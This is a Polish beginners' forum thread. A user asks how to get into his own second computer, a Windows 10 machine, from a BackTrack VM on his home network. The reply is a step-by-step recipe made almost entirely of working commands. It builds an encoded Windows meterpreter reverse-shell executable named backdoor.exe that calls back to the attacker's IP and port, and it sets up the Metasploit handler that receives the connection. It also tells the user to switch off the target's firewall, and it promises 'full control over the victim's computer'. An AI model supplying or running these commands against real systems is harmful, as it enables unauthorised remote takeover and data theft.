Przejęcie kontroli nad drugim komputerem.

Pytania dla zielonych dotyczące bezpieczeństwa.
Rever
Posty: 1
Rejestracja: 15 kwie 2017, 11:18

Przejęcie kontroli nad drugim komputerem.

Post autor: Rever »

Witam.
Posiadam dwa komputery (oba należą tylko do mnie) i chciałbym w celach edukacyjnych i z czystej ciekawości spróbować "wejść" z jednego na drugi.
Na jednym komputerze poprzez VirtualBox - BackTrack5 (mogę pobrać kali'ego jeśli trzeba). Komputer docelowy Win10.
Oba połączone w sieci domowej.
Nie chce niszczyć komputera, tylko np uzyskać informacje co jest w drugim komputerze, wykonać screeny, ściągnąć plik z jednego na drugi.
Czytałem już jakieś poradniki na temat wejście przez otwarte porty lub połączenie SSH jednak nie są one dla mnie jasne gdyż dopiero zaczynam się bawić w tej dziedzinie.
Jeżeli jest potrzebne napisanie jakiegoś kodu to znam języki C,C++,Java.
Awatar użytkownika
eni0
Posty: 7
Rejestracja: 17 kwie 2017, 18:11

Re: Przejęcie kontroli nad drugim komputerem.

Post autor: eni0 »

1.Ustaw przekierowania portów na komputer "atakującego" (Poczytaj o tym jak nie wiesz jak to zrobić).
2.Wpisz w konsoli ifconfig i sprawdź swoje ip.
3.W konsoli wpisz
msfvenom -p windows/meterpreter/reverse_tcp lhost=IP_ATAKUJĄCEGO lport=PORT_KTÓRY_USTAWIŁEŚ_W_PRZEKIEROWANIU -e cmd/powershell_base64 -i 5 -f exe > NAZWA.exe

Przykład: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.254 lport=1234 -e cmd/powershell_base64 -i 5 -f exe > backdoor.exe
4.Plik, który się utworzył wrzuć do drugiego pc.
5.Wpisz w konsoli:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.254 <----tutaj wpisujesz swoje ip
set lport 1234 <----tutaj wpisujesz port ustawiony w przekierowaniu
exploit
6.Odpal program na drugim pc (wyłącz zaporę sieciową).
7.Powinieneś mieć już pełną kontrolę na komputerem "ofiary". W razie problem pisz pw powinienem odpisać w wolnym czasie.
ODPOWIEDZ